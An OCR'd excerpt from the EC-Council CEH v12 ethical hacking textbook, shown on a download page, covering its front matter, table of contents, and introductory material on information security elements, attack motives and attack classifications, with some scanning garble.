Certified Ethical Hacker (CEH) v12 Textbook [1, 12 ed.] 9798885931144

Textbook for Certified Ethical Hacker (CEH) Certified Ethical Hacker | CEH Certification The Certified Ethical Hacker

146 70 384MB

English Pages [3800] Year 2023

Report DMCA / Copyright

DOWNLOAD PDF FILE

Table of contents :
Course Outline
20 Modules that help you master the foundations of
Ethical Hacking and prepare to challenge the CEH certification exam.
Module 1: Introduction to Ethical Hacking
Module 2: Foot Printing and Reconnaissance
Module 3: Scanning Networks
Module 4: Enumeration
Module 5: Vulnerability Analysis
Module 6: System Hacking
Module 7: Malware Threats
Module 8: Sniffing
Module 9: Social Engineering
Module 10: Denial-of-Service
Module 11: Session Highjacking
Module 12: Evading IDS, Firewalls, and Honeypots
Module 13: Hacking Web Servers
Module 14: Hacking Web Applications
Module 15: SQL Injection
Module 16: Hacking Wireless Networks
Module 17: Hacking Mobile Platforms
Module 18: IoT and OT Hacking
Module 19: Cloud Computing
Module 20: Cryptography
Recommend Papers

Certified Ethical Hacker (CEH) v12 Textbook [1, 12 ed.]
 9798885931144

  • Commentary
  • Official textbook for CEH v12 certification
  • 0 0 0
  • Like this paper and download? You can publish your own PDF file online for free in a few minutes! Sign Up
File loading please wait...
Citation preview



C\EH

Certified |) Ethical Hacker

EC-Council ETHICAL HACKING AND COUNTERMEASURES

PROFESSIONAL SERIE



C\EH

Certified |) Ethical Hacker

EC-Council ETHICAL HACKING AND COUNTERMEASURES

PROFESSIONAL SERIE

Ethical Hacking and Countermeasures Version

12

Copyright © 2022 by EC-Council. All rights reserved. Except as permitted under the Copyright Act of 1976, no part of this publication may be reproduced or distributed in any form or by any means, or stored in a database or retrieval system, without the prior written permission of the publisher, with the exception that the program listings may be entered, stored, and executed in a computer system, but may not be reproduced for publication without the prior written permission of the publisher, except in the case of brief quotations embodied in critical reviews and certain other noncommercial uses permitted by copyright law. For permission requests, write to EC-Council, addressed “Attention: EC-Council,” at the address below:

EC-Council New Mexico 101C Sun Ave NE Albuquerque, NM 87109 Information contained in this publication has been obtained by EC-Council from sources believed to be reliable. ECCouncil takes reasonable measures to ensure that the content is current and accurate; however,

because of the

possibility of human or mechanical error, we do not guarantee the accuracy, adequacy, or completeness of any information and are not responsible for any errors or omissions nor for the accuracy of the results obtained from

use of such information.

The courseware is a result of extensive research and contributions from subject-matter experts from all over the world. Due credits for all such contributions and references are given in the courseware in the research endnotes. We are committed to protecting intellectual property rights. If you are a copyright owner (an exclusive licensee or their agent) and you believe that any part of the courseware constitutes an infringement of copyright, or a breach of an agreed license or contract, you may notify us at [email protected]. In the event of a justified complaint, ECCouncil will remove the material in question and make necessary rectifications. The courseware may contain references to other information resources and security solutions, but such references should not be considered as an endorsement of or recommendation by EC-Council. Readers are encouraged to report errors, omissions, and inaccuracies to EC-Council at [email protected]. If you have any issues, please contact us at [email protected].

NOTICE TO THE READER EC-Council does not warrant or guarantee any of the products, methodologies, or frameworks described herein nor does it perform any independent analysis in connection with any of the product information contained herein. ECCouncil does not assume, and expressly disclaims, any obligation to obtain and include information other than that provided to it by the manufacturer. The reader is expressly warned to consider and adopt all safety precautions that might be indicated by the activities described herein and to avoid all potential hazards. By following the instruction contained herein, the reader willingly assumes all risks in connection with such instructions. EC-Council makes no representations or warranties of any kind, including but not limited to the warranties of fitness for particular purpose or merchantability, nor are any such representations implied with respect to the material set forth herein, and ECCouncil takes no responsibility with respect to such material. EC-Council shall not be liable for any special, consequential, or exemplary damages resulting, in whole or in part, from the reader’s use of or reliance upon this

material.

Page Il

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Foreword Since you are reading this CEHv12 courseware, you most likely realize the importance of information systems security. However, we would like to put forth our motive behind compiling a resource such as this one and what you can gain from this course. You might find yourself asking what sets this course apart from the others out there. The truth is that no single courseware can address all the issues of information security in a detailed manner.

Moreover, the rate at which exploits, tools, and methods are being discovered by the security community makes it difficult for one program to cover all the necessary facets of information security. This doesn’t mean that this course is inadequate in any way as we have worked to cover all major domains in such a manner that the reader will be able to appreciate the way security has evolved over time as well as gain insight in to the fundamental workings relevant to each domain. It is a blend of academic and practical wisdom supplemented with tools that the reader can readily access in order to obtain a hands-on experience.

The emphasis throughout the courseware is on gaining practical know-how, which explains the stress on free and accessible tools. You will read about some of the most widespread attacks seen, the popular tools used by attackers, and how attacks have been carried out using ordinary

resources.

You may also want to know what to expect once you have completed the course. This courseware is a resource material. Any penetration tester can tell you that there is no one straight methodology or sequence of steps that you can follow while auditing a client site. There is no one template that will meet all your needs. Your testing strategy will vary with the client, the basic information about the system or situation, and the resources at your disposal. However, for each stage you choose — be it enumeration, firewall, penetration of other domains - you will find something in this courseware that you can definitely use. Finally, this is not the end! This courseware is to be considered a constant work-in-progress because we will be adding value to this courseware over time. You may find some aspects extremely detailed, while others may have less detail. We are constantly asking ourselves if the content helps explain the core point of the lesson, and we constant calibrate our material with that in mind. We would love to hear your viewpoints and suggestions so please send us your feedback to help in our quest to constantly improve our courseware.

Page ll

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

About the EC-Council CEH Program If you want to stop hackers from invading your network, first you've got to invade their minds. Computers around the world are systematically being victimized by rampant hacking. This hacking is not only widespread, but is being executed so flawlessly that the attackers compromise a system, steal everything of value and completely erase their tracks. The goal of the ethical hacker is to help the organization take preemptive measures against malicious attacks by attacking the system himself; all the while staying within legal limits. This philosophy stems from the proven practice of trying to catch a thief, by thinking like a thief. As technology advances and organization depend on technology increasingly, information assets have evolved into critical components of survival. If hacking involves creativity and thinking ‘out-of-the-box’, then vulnerability testing and security audits will not ensure the security proofing of an organization. To ensure that organizations have adequately protected their information assets, they must adopt the approach of ‘defense in depth’. In other words, they must penetrate their networks and assess the security posture for vulnerabilities and exposure. The Ethical Hacker is an individual who is usually employed with the organization and who can be trusted to undertake an attempt to penetrate networks and/or computer systems using the same methods as a Hacker. Hacking is a felony in some countries. When it is done by request and under a contract between an Ethical Hacker and an organization, it is legal. The most important point is that an Ethical Hacker has authorization to probe the target. The CEH Program certifies individuals in the specific network security discipline of Ethical Hacking from a vendor-neutral perspective. The Certified Ethical Hacker certification will fortify the application knowledge of security officers, auditors, security professionals, site administrators, and anyone who is concerned about the integrity of the network infrastructure. A Certified Ethical Hacker is a skilled professional who understands and knows how to look for the weaknesses and vulnerabilities in target systems and uses the same knowledge and tools as a malicious hacker. To achieve the Certified Ethical Hacker Certification, you must pass the CEH exam 312-50.

Please visit information.

https://www.eccouncil.org/programs/certified-ethical-hacker-ceh

for

more

Course Prerequisites It is highly recommended that candidates pursuing this course have a fundamental understanding of operating systems, file systems, computer networks, TCP/IP protocols, information security controls, basic network troubleshooting, data leakage, data backup, and risk

management.

Page IV

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

About EC-Council The International Council of Electronic Commerce Consultants, better known as EC-Council, was founded in late 2001 to address the need for well-educated and certified information security and e-business practitioners. EC-Council is a global, member-based organization composed of industry and subject matter experts working together to set the standards and raise the bar in information security certification and education.

EC-Council first developed the the methodologies, tools, and of hundreds of subject-matter the world and is now delivered centers. It is considered as the around the globe.

Certified Ethical Hacker (C|EH) program with the goal of teaching techniques used by hackers. Leveraging the collective knowledge experts, the CEH program has rapidly gained popularity around in more than 145 countries by more than 950 authorized training benchmark for many government entities and major corporations

EC-Council, through its impressive network of professionals and huge industry following, has also developed a range of other leading programs in information security and e-business. EC-Council certifications are viewed as the essential certifications needed when standard configuration and security policy courses fall short. Providing a true, hands-on, tactical approach to security, individuals armed with the knowledge disseminated by EC-Council programs are tightening security networks around the world and beating hackers at their own game.

Other EC-Council Programs “ve

Awareness: Certified Secure Computer User

The purpose of the CSCU training program is to provide students with the necessary knowledge and skills to protect their information assets. C s C U This class will immerse students in an interactive learning environment where they will acquire fundamental understanding of various cers | Secure Computer User computer and network security threats such as identity theft, credit card fraud, online banking phishing scams, viruses and backdoors, email hoaxes, sexual predators and other online threats, loss of confidential information, hacking attacks, and social engineering. More importantly, the skills learnt from the class help students take the necessary steps to mitigate their security exposure.



Security: Certified Cybersecurity Technician

Certified |ctety

Page V

Technician

The Certified Cybersecurity Technician (CCT) program covers the fundamental concepts of cybersecurity. It equips students with the skills required to identify the increasing network security threats that reflect on the organization's security posture and implement general security controls to protect the underlying IT infrastructure from unauthorized . . . access, alteration, destruction, or disclosure.

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

This program gives a holistic overview of the key components of cybersecurity. The course is designed for those interested in learning the various fundamentals of cybersecurity and aspire to pursue a career in cybersecurity.

Network Defense: Certified Network Defender Students enrolled in the Certified Network Defender course will gain a detailed understanding of network defense and develop their hands-on C N D expertise to perform in real-life network defense situations. They will gain the depth of technical knowledge required to actively design a secure Certified | Network Defender network within your organization. This course provides a fundamental understanding of the true nature of data transfer, network technologies, and software technologies so that students may understand how networks operate, how automation software behaves, and how to analyze networks and their defense. Students will learn how to protect, detect, and respond to the network attacks as well as learning about network defense fundamentals, the application of network security controls, protocols, perimeter appliances, secure IDS, VPN, and firewall configuration. Students will also learn the intricacies of network traffic signature, analysis, and vulnerability scanning, which will help in designing improved network security policies and successful incident response plans. These skills will help organizations foster resiliency and operational continuity during attacks.

Network Defense: Certified Cloud Security Engineer Certified Cloud Security Engineer (CCSE) course includes both vendor neutral and vendor specific cloud security concepts. Vendor neutral C C S E concepts include universally applicable general cloud security best practices, | technology, | frameworks, and principles that help Cloud Security Engineer individuals to strengthen their fundamentals. Vendor specific concepts help individuals to gain the practical skills required when they actually start working with a specific cloud platform. Thus, this course helps individuals in strengthening their fundamental cloud security knowledge and gain practical knowledge of security practices, tools, and techniques used to configure widely used public cloud providers such as AWS, AZURE, and GCP.

Penetration Testing: Certified Penetration Testing Professional CPENT certification requires you to demonstrate the application of advanced penetration testing techniques such as advanced C PENT Windows attacks, IOT systems attacks, advanced binaries exploitation, exploits writing, bypassing a filtered network, nit | Penetration Testing Professional Operational Technology (OT) pen testing, accessing hidden networks with pivoting and double pivoting, privilege escalation, and evading defense mechanisms.

Page VI

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

EC-Council’s CPENT standardizes the knowledge base for penetration testing professionals by incorporating best practices followed by experienced experts in the field. The objective of the CPENT is to ensure that each professional follows a strict code of ethics, is exposed to the best practices in the domain of penetration testing and aware of all the compliance requirements required by the industry. Unlike a normal security certification, the CPENT credential provides an assurance that security professionals possess skills to analyze the security posture of a network exhaustively and recommend corrective measures authoritatively. For many years EC-Council has been certifying IT Security Professionals around the globe to ensure these professionals are proficient in network security defense mechanisms. EC-Council’s credentials vouch for their professionalism and expertise thereby making these professionals more sought after by organizations and consulting firms globally.

Computer Forensics: Computer Hacking Forensic Investigator ™ Computer | Hacking Forensic

INVESTIGATOR

Computer Hacking Forensic Investigator (CHFI) is a comprehensive course covering major forensic investigation scenarios. It enables students to acquire crucial hands-on experience with various forensic investigation techniques. Students learn how to utilize standard

forensic

tools

to

successfully

carry

out

a

computer

investigation, preparing them to better aid in the prosecution of perpetrators.

forensic

EC-Council’s CHFI certifies individuals in the specific security discipline of computer forensics from a vendor-neutral perspective. The CHFI certification bolsters the applied knowledge of law enforcement personnel, system administrators, security officers, defense and military personnel, legal professionals, bankers, security professionals, and anyone who is concerned about the integrity of network infrastructures.

Incident Handling: EC-Council Certified Incident Handler |



EC-Council’s Certified Incident Handler (E|CIH) program has been designed and developed in collaboration with cybersecurity and E C | H incident handling and response practitioners across the globe. EG-Council | certified incident Handler [t is a comprehensive specialist-level program that imparts knowledge and skills that organizations need to effectively handle post breach consequences by reducing the impact of the incident, from both a financial and a reputational perspective. E|CIH is a method-driven program that uses a holistic approach to cover vast concepts concerning organizational incident handling and response from preparing and planning the incident handling response process to recovering organizational assets after a security incident. These concepts are essential for handling and responding to security incidents to protect organizations from future threats or attacks.

Page VII

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

nl

Certified Chief Information Security Officer

The Certified Chief Information Security Officer (CCISO) program was developed by EC-Council to fill a knowledge gap in the information C ¢c | $0 security industry. Most information security certifications focus on Certified | Security Officer specific tools or practitioner capabilities. When the CCISO program was developed, no certification existed to recognize the knowledge, skills, and aptitudes required for an experienced information security professional to perform the duties of a CISO effectively and competently. In fact, at that time, many questions existed about what a CISO really was and the value this role adds to an organization. The CCISO Body of Knowledge helps to define the role of the CISO and clearly outline the contributions this person makes in an organization. EC-Council enhances this information through training opportunities conducted as instructor-led or self-study modules to ensure candidates have a complete understanding of the role. EC-Council evaluates the knowledge of CCISO candidates with a rigorous exam that tests their competence across five domains with which a seasoned security leader should be familiar.

Application Security: Certified Application Security Engineer AYNTN C

A

const | sss

SEE

C

A

S

E

Cenifed | Apoticaton Securiy Ensineer

The Certified Application Security Engineer

(CASE)

credential

is

developed

in

partnership with large application and software development experts globally.

The

CASE

credential

tests

the

critical

security skills and knowledge required throughout a typical software development life cycle (SDLC), focusing on the importance of the implementation of secure methodologies and practices in today’s insecure operating environment.

The CASE certified training program is developed concurrently to prepare software professionals with the necessary capabilities that are expected by employers and academia globally. It is designed to be a hands-on, comprehensive application security course that will help software professionals create secure applications. The training program encompasses security activities involved in all phases of the Software Development Lifecycle (SDLC): planning, creating, testing, and deploying an application. Unlike other application security trainings, CASE goes beyond just the guidelines on secure coding practices and includes secure requirement gathering, robust application design, and handling security issues in post development phases of application development. This makes CASE one of the most comprehensive certifications on the market today. It is desired by software application engineers, analysts, testers globally, and respected by hiring authorities.

Page VIIL

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Incident Handling: Certified Threat Intelligence Analyst

C

I

|

A

cain | Threat Intelligence Analyst

Certified Threat Intelligence Analyst (C| TIA) is designed and developed in collaboration with cybersecurity and threat intelligence experts across the globe to help organizations identify and mitigate business risks by converting unknown internal and external threats into known threats. It is a comprehensive, specialist-level program that teaches a structured approach for building effective threat intelligence.

In the ever-changing threat landscape, C|TIA is an essential Threat Intelligence training program for those who deal with cyber threats on a daily basis. Organizations today demand a professional-level cybersecurity threat intelligence analyst who can extract the intelligence from data by implementing various advanced strategies. Such professional-level Threat Intelligence training programs can only be achieved when the core of the curricula maps with and is compliant to government and industry published threat intelligence frameworks.

Incident Handling: Certified SOC Analyst The Certified SOC Analyst (CSA) program is the first step to joining a security operations center (SOC). It is engineered for current and aspiring Tier | and Tier Il SOC analysts to achieve proficiency in performing entry-level and intermediate-level operations. CSA is a training and credentialing program that helps the candidate Certified SOC = Analyst acquire trending and in-demand technical skills through instruction by some of the most experienced trainers in the industry. The program focuses on creating new career opportunities through extensive, meticulous knowledge with enhanced level capabilities for dynamically contributing to a SOC team. Being an intense 3-day program, it thoroughly covers the fundamentals of SOC operations, before relaying the knowledge of log management and correlation, SIEM deployment, advanced incident detection, and incident response. Additionally, the candidate will learn to manage various SOC processes and collaborate with CSIRT at the time of need.

Page IX

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

CEH

Exam

Information CEH Exam Details

Exam Title

Certified Ethical Hacker (CEH)

Exam Code

312-50

Availability

EC-Council Exam Portal (please visit https://www.eccexam.com)

VUE (please visit https://home.pearsonvue.com/eccouncil) Duration

4 Hours

Questions

125

Passing Score

Please refer https://cert.eccouncil.org/faq.html

Please visit https://cert.eccouncil.org/certified-ethical-hacker.html for more information.

Page X

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Table of Contents Module 01: Introduction to Ethical Hacking

1

Information Security Overview

4

Hacking Methodologies and Frameworks

13

Hacking Concepts

36

Ethical Hacking Concepts

42

Information Security Controls

51

Information Security Laws and Standards

82

Module 02: Footprinting and Reconnaissance

101

Footprinting Concepts

104

Footprinting through Search Engines

112

Footprinting through Web Services

133

Footprinting through Social Networking Sites

176

Website Footprinting

189

Email Footprinting

207

Whois Footprinting

214

DNS Footprinting

221

Network Footprinting

227

Footprinting through Social Engineering

238

Footprinting Tools

244

Footprinting Countermeasures.

254

Module 03: Scanning Networks

257

Network Scanning Concepts

260

Scanning Tools

271

Host Discovery

282

Port and Service Discovery

297

OS Discovery (Banner Grabbing/OS Fingerprinting)

331

Scanning Beyond IDS and Firewall

345

Network Scanning Countermeasures

380

Module 04: Enumeration

Page XI

397

Enumeration Concepts

400

NetBIOS Enumeration

411

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

SNMP Enumeration

422

LDAP Enumeration

432

NTP and NFS Enumeration

442

SMTP and DNS Enumeration

456

Other Enumeration Techniques

479

Enumeration Countermeasures

504

Module 05: Vulnerability Analysis

511

Vulnerability Assessment Concepts

515

Vulnerability Classification and Assessment Types

542

Vulnerability Assessment Tools

558

Vulnerability Assessment Reports

575

Module 06: System Hacking Gaining Access

584

Escalating Privileges

708

Maintaining Access

771

Clearing Logs

902

Module 07: Malware Threats

943

Malware Concepts

946

APT Concepts

961

Trojan Concepts

969

Virus and Worm Concepts

1021

Fileless Malware Concepts

1062

Malware Analysis

1084

Malware Countermeasures

1186

Anti-Malware Software

1195

Module 08: Sniffing

Page Xil

581

1205

Sniffing Concepts

1208

Sniffing Technique: MAC Attacks

1227

Sniffing Technique: DHCP Attacks

1242

Sniffing Technique: ARP Poisoning

1255

Sniffing Technique: Spoofing Attacks

1271

Sniffing Technique: DNS Poisoning

1289

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Sniffing Tools

1301

Snifing Countermeasures

1314

Module 09: Social Engineering

1325

Social Engineering Concepts

1328

Social Engineering Techniques

1336

Insider Threats

1367

Impersonation on Social Networking Sites

1375

Identity Theft

1382

Social Engineering Countermeasures

1388

Module 10: Denial-of-Service

1413

DoS/DDoS Concepts

1416

Botnets

1421

DoS/DDoS Attack Techniques

1433

DDoS Case Study

1467

DoS/DDoS Attack Countermeasures

1476

Module 11: Session Hijacking

1507

Session Hijacking Concepts

1510

Application-Level Session Hijacking

1526

Network-Level Session Hijacking

1556

Session Hijacking Tools

1567

Session Hijacking Countermeasures

1573

Module 12: Evading IDS, Firewalls, and Honeypots

Page XIII

1603

IDS, IPS, Firewall, and Honeypot Concepts

1606

IDS, IPS, Firewall, and Honeypot Solutions

1641

Evading IDS

1666

Evading Firewalls

1690

Evading NAC and Endpoint Security

1728

IDS/Firewall Evading Tools

1752

Detecting Honeypots

1756

IDS/Firewall Evasion Countermeasures

1763

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Module 13: Hacking Web Servers

1769

Web Server Concepts

1772

Web Server Attacks

1782

Web Server Attack Methodology

1804

Web Server Attack Countermeasures

1843

Patch Management

1871

Module 14: Hacking Web Applications

1879

Web Application Concepts

1883

Web Application Threats

1894

Web Application Hacking Methodology

1989

Web API, Webhooks, and Web Shell

2086

Web Application Security

2142

Module 15: SQL Injection

2195

SQL Injection Concepts

2198

Types of SQL Injection

2212

SQL Injection Methodology

2230

SQL Injection Tools

2314

Evasion Techniques

2319

SQL Injection Countermeasures

2337

Module 16: Hacking Wireless Networks

2361

Wireless Concepts

2364

Wireless Encryption

2381

Wireless Threats

2400

Wireless Hacking Methodology

2432

Wireless Hacking Tools

2515

Bluetooth Hacking

2528

Wireless Attack Countermeasures

2544

Wireless Security Tools

2558

Module 17: Hacking Mobile Platforms

2577

Mobile Platform Attack Vectors

2580

Hacking Android OS

2617

Hacking iOS

2679

Page XIV

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Mobile Device Management

2712

Mobile Security Guidelines and Tools

2727

Module 18: loT and OT Hacking

2759

loT Concepts

2764

loT Attacks

2786

loT Hacking Methodology

2834

loT Attack Countermeasures

2895

OT Concepts

2914

OT Attacks

2942

OT Hacking Methodology

2972

OT Attack Countermeasures

3015

Module 19: Cloud Computing

3035

Cloud Computing Concepts

3039

Container Technology

3080

Serverless Computing

3108

Cloud Computing Threats

3115

Cloud Hacking

3178

Cloud Security

3250

Module 20: Cryptography

3311

Cryptography Concepts

3314

Encryption Algorithms

3321

Cryptography Tools

3370

Public Key Infrastructure (PKI)

3380

Email Encryption

3388

Disk Encryption

3421

Cryptanalysis

3431

Cryptography Attack Countermeasures

3459

Glossary

3465

References

3493

Appendix A - Ethical Hacking Essential Concepts - |

3565

Appendix B - Ethical Hacking Essential Concepts - II

3685

Page XV

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

C\EH

Ec-Council

Certified |) Ethical Hacker

MODULE 01

———

INTRODUCTION TO ——— ETHICAL HACKI mirnoe

01 [

(1+x+y+ 2a)-3a

mh-->0

+2a....+a

eheaBad}j

—_

context,

sq}agied_obF

ect sfone.name]. se

a

exactly Lays a pitase ! selec t Pixty2 Jptntt

lextyt2a#21

Asbes

2+ ssdotton”

lim h=->0

;

=

f="

‘’

x

1+ x SVe2a)e(3ae3q909 *ec 1

““EC-COUNCIL OFFICIAL CURRICULA

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

CEH

LEARNING

OBJECTIVES

© LO#01: Explain Information Security Concepts

© LO#04: Explain Ethical Hacking Concepts and Scope

© LO#02: Explain Hacking Methodologies and Frameworks

© LO#05: Summarize the Techniques used in Information Security Controls

@ LO#03: Explain Hacking Concepts and

©

Different Hacker Classes

LO#06: Explain the Importance of Applicable Security

Laws and Standards

Copyright © by

Al RightsReserved, Reproduction

i Strictly Prohibited.

Learning Objectives Attackers break into systems for various reasons and purposes. Therefore, it is important to understand how malicious hackers attack and exploit systems and the probable reasons behind these attacks. As Sun Tzu states in the Art of War, “If you know yourself but not the enemy, for every victory gained, you will also suffer a defeat.” System administrators and security professionals must guard their infrastructure against exploits by knowing the enemy—malicious hackers who seek to use the same infrastructure for illegal activities.

At the end of this module, you will be able to: =

Describe the elements of information security

=

Explain information security attacks and information warfare

=

Describe various hacking methodologies and frameworks

=

Describe hacking concepts and hacker classes

=

Explain ethical hacking concepts and scope

=

Understand information security controls (information assurance, defense-in-depth, risk management, cyber threat intelligence, threat modeling, incident management process, and artificial intelligence (Al)/machine learning (ML))

=

Understand various information security acts and laws

Module 01 Page 3

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

CEH

LO#01: Explain Information Security Concepts

Copyright © by

ved

Strictly Prohibited

Information Security Overview Information security refers to the protection or safeguarding of information and information systems that use, store, and transmit information from unauthorized access, disclosure, alteration, and destruction. Information is a critical asset that organizations must secure. If sensitive information falls into the wrong hands, then the respective organization may suffer huge losses in terms of finances, brand reputation, customers, or in other ways. To provide an understanding of how to secure such critical information resources, this module starts with an overview of information security. This section introduces information warfare.

Module 01 Page 4

the

elements

of information

security,

classification

of attacks,

and

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

Elements of Information Security

CE H

Information security is a state of well-being of information and infrastructure in which the possibility of theft, tampering, and disruption of information and services is low or tolerable Confidentiality

Integrity Availability Authenticity Non-Repudiation

Assurance that the information is accessible only to those authorized to have access

The trustworthinessof data or resources in terms of preventing improper or unauthorized changes Assurance that the systems responsible for delivering, storing, and processing information are accessible when required by the authorized users Refers to the characteristic of a communication, document, or any data that ensures the quality of being genuine

A guarantee that the sender of a message cannot later deny having sent the message and that the recipient cannot deny having received the message

Elements of Information Security Information security is “the state of the well-being of information and infrastructure in which the possibility of theft, tampering, or disruption of information and services is kept low or tolerable.” It relies on five major elements: confidentiality, integrity, availability, authenticity, and non-repudiation. Confidentiality Confidentiality is the assurance that the information is accessible only to authorized. Confidentiality breaches may occur due to improper data handling or a hacking attempt. Confidentiality controls include data classification, data encryption, and proper disposal of equipment (such as DVDs, USB drives, and Blu-ray discs). Integrity Integrity is the trustworthiness of data or resources in the prevention of improper and unauthorized changes—the assurance that information is sufficiently accurate for its purpose. Measures to maintain data integrity may include a checksum (a number produced by a mathematical function to verify that a given block of data is not changed) and access control (which ensures that only authorized people can update, add, or delete data).

Availability Availability is the assurance that the systems responsible for delivering, storing, and processing information are accessible when required by authorized users. Measures to maintain data availability can include disk arrays for redundant systems and clustered

Module 01 Page 5

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Introduction to Ethical Hacking machines, antivirus software (DDoS) prevention systems.

=

Exam 312-50 Certified Ethical Hacker

to

combat

malware,

and

distributed

denial-of-service

Authenticity Authenticity refers to the characteristic of communication, documents, or any data that ensures the quality of being genuine or uncorrupted. The major role of authentication is to confirm that a user is genuine. Controls such as biometrics, smart cards, and digital certificates ensure the authenticity of data, transactions, communications, and documents.

=

Non-Repudiation Non-repudiation is a way to guarantee that the sender of a message cannot later deny having sent the message and that the recipient cannot deny having received the message. Individuals and organizations use digital signatures to ensure non-repudiation.

Module 01 Page 6

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

Motives, Goals, and Objectives of Information Security Attacks Attacks = Motive (Goal)

CE H

+ Method + Vulnerability

‘@ A motive originates out of the notion that the target system stores or processes something valuable, and this leads to the threat of an attack on the system

@ Attackers try various tools and attack techniques to exploit vulneral policy and controls in order to fulfil their motives

s in a computer system or its security

Motives behind information security attacks

© Disrupting business continuity © Stealinginformation and manipulating data

Propagating religious or political beliefs Achievinga state’s military objectives

© Creating fear and chaos by disrupting critical

the reputation of the target Damaging

infrastructures © Causing financial lossto the target

Takingrevenge Demandingransom

Motives, Goals, and Objectives of Information Security Attacks Attackers generally have motives (goals), and objectives behind their information security attacks. A motive originates out of the notion that a target system stores or processes something valuable, which leads to the threat of an attack on the system. The purpose of the attack may be to disrupt the target organization’s business operations, to steal valuable information for the sake of curiosity, or even to exact revenge. Therefore, these motives or goals depend on the attacker’s state of mind, their reason for carrying out such an activity, as well as their resources and capabilities. Once the attacker determines their goal, they can employ various tools, attack techniques, and methods to exploit vulnerabilities in a computer system or security policy and controls.

Attacks = Motive (Goal) + Method + Vulnerability Motives behind information security attacks

=

Disrupt business continuity

=

Propagate religious or political beliefs

=

Perform information theft

=

Achieve a state’s military objectives

=

Manipulating data

=

Damage the reputation of the target

=

Create fear and chaos by disrupting critical infrastructures

= *

Take revenge Demand ransom

=

Bring financial loss to the target

Module 01 Page 7

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

Classification of Attacks

CE H

Passive Attacks

@ Passive attacksdo not tamper with the data and involve intercepting and monitoring network traffic and data flow on the target network @ Examples include sniffing and eavesdropping

Active Attacks

© Active attacks tamper with the data in transit or disrupt the communication or services between the systems to bypassor break into secured systems © Examples include DoS, Man-in-the-Middle, session hijacking, and SQL injection

Close-in Attacks

© Close-in attacksare performed when the attacker is in close physical proximity with the target system or network in order to gather, modify, or disrupt access to information

© Examples include social engineering such as eavesdropping, shoulder surfing, and dumpster diving

Insider Attacks

© Insider attacks involve using privileged access to violate rules or intentionally cause a threat to the organization’s information or information systems © Examples include theft of physical devices and planting keyloggers, backdoors, and malware

Distribution

© Distribution attacks occur when attackers tamper with hardware or software prior to installation

Attacks

© Attackers tamper with the hardware or software at its source or in transit

Classification of Attacks According to IATF, security attacks are classified into five categories: insider, and distribution.

passive, active, close-in,

Passive Attacks Passive attacks involve intercepting and monitoring network traffic and data flow on the target network and do not tamper with the data. Attackers perform reconnaissance on network activities using sniffers. These attacks are very difficult to detect as the attacker has no active interaction with the target system or network. Passive attacks allow attackers to capture the data or files being transmitted in the network without the consent of the user. For example, an attacker can obtain information such as unencrypted data in transit, clear-text credentials, or other sensitive information that is useful in performing active attacks.

Examples of passive attacks: o

Footprinting

o.

Sniffing and eavesdropping

o

Network traffic analysis

o

Decryption of weakly encrypted traffic

Active Attacks Active attacks tamper with the data in transit or disrupt communication or services between the systems to bypass or break into secured systems. Attackers launch attacks on the target system or network by sending traffic actively that can be detected. These

Module 01 Page 8

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

attacks are performed on the target network to exploit the information in transit. They penetrate or infect the target’s internal network and gain access to a remote system to compromise the internal network. Examples of active attacks: o

Denial-of-service (DoS) attack

©

Firewall and IDS attack

o

Bypassing protection mechanisms

©.

Profiling

o

Malware attacks (such as

o

Arbitrary code execution

o

Modification of information

©

Backdoor access

©

Spoofing attacks

o

Replay attacks

©

Cryptography attacks

o

Password-based attacks

© ©

SQL injection XSS attacks

©

Session hijacking

o

Directory traversal attacks

o

Man-in-the-Middle attack

o

o

Compromised-key attack

o

viruses, worms, ransomware)

DNS and ARP poisoning

©.

Privilege escalation

Exploitation of application and

OS software

Close-in Attacks Close-in attacks are performed when the target system or network. The main goal modify information or disrupt its access. user credentials. Attackers gain close access, or both.

attacker is in close physical proximity with the of performing this type of attack is to gather or For example, an attacker might shoulder surf proximity through surreptitious entry, open

Examples of close-in attacks: o

Social engineering (Eavesdropping, shoulder surfing, dumpster diving, and other methods)

